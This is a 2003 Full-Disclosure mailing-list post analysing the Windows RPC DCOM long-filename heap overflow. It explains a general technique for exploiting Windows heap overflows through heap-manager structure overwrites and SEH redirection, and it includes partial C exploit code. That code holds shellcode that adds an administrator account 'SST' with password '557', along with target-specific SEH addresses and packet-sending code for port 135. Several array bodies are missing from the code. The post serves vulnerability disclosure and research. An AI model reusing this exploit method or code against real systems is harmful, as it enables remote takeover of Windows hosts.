[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] [xfocus]The Analysis of RPC Long Filename Heap Overflow AND a Way to Write Universal Heap Overflow of Windows
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] [xfocus]The Analysis of RPC Long Filename Heap Overflow AND a Way to Write Universal Heap Overflow of Windows
- From: "quack@xxxxxxxxxx" <quack@xxxxxxxxxx>
- Date: Sun, 21 Sep 2003 01:28:56 +0800
The Analysis of RPC Long Filename Heap Overflow AND a Way to Write
Universal Heap Overflow of Windows
Create: 2003-09-21
Author: flashsky (flashsky1_at_xfocus.org)
The Analysis of RPC Long Filename Heap Overflow AND a Way to Write Universal
Heap Overflow of Windows
Venus Active Defence Research Center
Thanks:Colleagues of Venus,eyas(eyas@xxxxxxxxxx),benjurry(benjurry@xxxxxxxxxx)
and all menbers of xfocus
The RPC DCOM long file name heap overflow is similar to LSD's stack
overflow,they all exist in CoGetInstanceFromFile API ,which was discoveried by
Yuange@NSfocus on ,And MS has Fixed the vulnerability on the 10th,SEP.Now let's
discuss the detail.
In the article of "The Analysis of LSD's Buffer Overrun in Windows RPC
Interface",We had discussed the CoGetInstanceFromFile API,which can use UNC
format ,and RPC DCOM program chekcks the servername of UNC,if the servername is
NetBios name or IP of localhost(include "localhost" and ""),then RPC
DCOM will process the filename in UNC.
Here is the code:
.text:76151469 push 20Ah
.text:7615146E push edi
.text:7615146F push hHeap
.text:76151475 call AllocHeap <------------------Only
allocate heap of 0X20A
.text:7615147B mov edi, eax
.text:7615147D test edi, edi
.text:7615147F jnz short loc_76151491
.text:76151481 push [ebp+hMem] ; hMem
.text:76151484 call ds:LocalFree
.text:7615148A loc_7615148A: ; CODE XREF:
.text:7615148A mov eax, 8007000Eh
.text:7615148F jmp short loc_761514B9
.text:76151491 ;
.text:76151491 loc_76151491: ; CODE XREF:
.text:76151491 mov eax, [ebp+hMem]
.text:76151494 push dword ptr [eax+18h] ; lpString2
.text:76151497 push edi ; lpString1
.text:76151498 call ds:lstrcpyW
.text:7615149E push esi ; lpString2
.text:7615149F push edi ; lpString1
.text:761514A0 mov [esi], bx
.text:761514A3 call ds:lstrcatW
<------------------Here,exist the Heap Overflow for MS hadn't check the length
of filename,
2,A Way to Write Universal Heap Overflow of Windows
By overlaying the Heap manager struct,we can modify the SEH or the return
address of function while releasing the heap.But Heap Overflow was recognized
as difficult to exploit for locating shellcode. Because the Address of heap is
not fixed ,there is no register or known address poiting the Shellcode,and we
can't get the shellcode by OPCODE such as JMP ESP.
Is there no way to exploit?NO!
As we know, with normal heap manager struct, Heap operation is list as
Content:ADDR1 ADDR2
Operation:MOV [ADDR2],ADDR1
After operating ,the ADDR2 is modified to adress of SEH,ADDR1 is address
of shellcode.And we can get the right when we handle the SEH.But how to locate
the shellcode?
By researching,we find that if we construct given heap manager structure
,it will do as following:
Assume ADDR3 is the up heap link of ADDR1
Content:ADDR1 ADDR2
Operation:MOV [ADDR2],ADDR3
Because ADD3 is located by system,we can execute the content of ADDR3
handling SEH.Althougn we can't control the content of ADDR3 ,we can control the
fist 8 bytes of ADDR3 by MOV [ADDR3],ADDR1.That is enough ,we can achieve JMP
and jump to our shellcode .General ,the size between ADDR3 and ADDR1 is fixed
in a given heap overflow, and we can extend this area by lots of NOP. If we can
construct Heap manager structure like this ,then we can exploit Heap Overflow.
At least we exploit the RPC long filename Heap Overflow.
The mechanism of exploit Universal Heap overflow can get from "Utilization
of released heap structure and exploit of universal Heap overflow in windows ".
Annotations:H D Moore utilizes this way in his EXP of HDM,but he hadn't
handled the problem of heap manager structure confusion,and it is still not
working 100%
3.The exploit of RPC long filename heap overflow
There is long time after I have solved how to locate the shellcode ,but
there is another trouble that it is abnormal when we use API in shellcode
because the heap manager structure was destroyed . At last I find the way is to
cover the default heap of PEB with another heap:
mov eax,fs:[0x00000018] <---------the address of PEB
mov eax,[eax+0x30]
lea eax,[eax+0x18] <---------get the address of default
process heap base
mov ebx,0x170000
mov [eax],ebx <-----------modify to 0X170000
Attention,0X170000 is only good for windows 2K(Chinese version)+SP4+MS03-26. It
is better if we create a new heap by HEAPCREATE in the shellcode ,then cover
the default heap of PEB with this address.
This part comes from eyas's research,(eyas@xxxxxxxxxx)
Because Winsocket uses GHEAP,which was assigned as process default address
at the initialization of dll ,the heap will be abnormal when call function of
Winsock. Our advice is that shellcode doesn't include Winsock or shellcode
seaches and modifies the GHEAP ,then calls Winsock.(For the address of GHEAP
may be not fixed in many version,it will lost compatibility.
Another way to use API(include WINSOCKET API) is recover heap,because the
structure of released chain is destroyed but not other structure ,So we can
analyse chain,and recovered it,and then we can call API optionally.
You can read more form my artic "Utilization of released heap structure and
exploit of universal Heap overflow in windows ".
Here we list the sample code to exploit the heap overflow:
To avoid be utilized by scripts kids and worm directly,the code we list is not
we explain the technology in the code
Affected system :
It is code of JMP 1E
ADDR3:Here ADDR3 is the address of UNC heap.
This code can exploit W2K SERVER+SP3/SP4+MS03-26,but in the condition of
Login stutas in SP3,it doesn't work well for the net heap of foregoing released
heap is not the structure our need to cover.
In SP4,it works very well.In the condition of LOGOUT status in SP3 ,We
nedd run it time after time.
We shall be give a example for How to send packets and control Heap
state,that we can make released heap and exploit Universal this hole.
We must modify the value of SEH according diffrent version.
The SHELLCODE add a user in administraor group ,username is SST,password is 557
RPCDCOM2.c ver1.1
copy by FLASHSKY <flashsky@xxxxxxxxxx> 2003.9.14
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>
unsigned char bindstr[]={
unsigned char request1[]={
unsigned char request2[]={
unsigned char request3[]={
unsigned char sccnsp3sp4[]=
//Add user SST,password is 557,
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" //
"\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26
"\x4C\x14\xec\x7C"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your
target's os
//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic
"Utilization of released heap structure and exploit of universal Heap overflow
in windows ".
unsigned char request4[]={
void main(int argc,char ** argv)
SOCKET sock;
int len,len1;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
printf("Code by FlashSky,Flashsky xfocus org\n");
printf("Welcome to our Site: http://www.xfocus.org\n");
printf("Welcome to our Site: http://www.venustech.com.cn\n");
printf("%s targetIP \n",argv[0]);
printf("for cn w2k server sp3/sp4+ms03-26\n");
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
printf("Socket failed.Error:%d\n",WSAGetLastError());
if(WSAConnect(sock,(struct sockaddr
printf("Connect failed.Error:%d",WSAGetLastError());
*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sccnsp3sp4)/2;
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sccnsp3sp4)/2;
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;
*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
printf("Send failed.Error:%d\n",WSAGetLastError());
if (send(sock,buf2,len1,0)==SOCKET_ERROR)
printf("Send failed.Error:%d\n",WSAGetLastError());
// len=recv(sock,buf1,1024,NULL);
wlj <wlj@xxxxxxxxxx>
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html